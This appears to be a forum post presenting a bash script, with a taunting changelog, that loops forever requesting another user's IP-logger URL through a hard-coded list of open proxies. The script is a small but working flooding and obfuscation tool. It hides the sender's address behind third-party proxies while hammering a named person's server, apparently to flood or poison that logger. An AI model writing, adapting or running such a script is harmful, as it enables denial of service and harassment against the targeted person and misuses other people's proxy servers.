Changelog: Added an array because you don't know what that means

Code:
#!/bin/bash
#version .03 2014-01-06
#report bugs to istalkoldbaldmenontheinternet@twictchingkitchen.com

#Set target to flaggercat's ip logger
Target=http://bushpigbushpigbushpigbushpigbushpigbushpigbushpigbushpigbushpigbushpigbushpigbushpigbushpig/8eHG

#Proxy list in format ipaddress:port
ProxyList=( 84.38.68.26:8118 219.150.204.30:8080 58.221.250.246:18186 119.233.255.24:80 222.20.74.24:18186 120.202.249.230:80 221.7.11.102:81 210.22.59.66:3128 218.104.148.59:3128 118.26.57.13:80 119.233.255.24:82 64.124.121.102:80 )

while true
do
	for Proxy in "${ProxyList[@]}"
	do
	wget -O /dev/null $Target -T 3 --tries=1 -e use_proxy=yes -e http_proxy=$Proxy
	done
done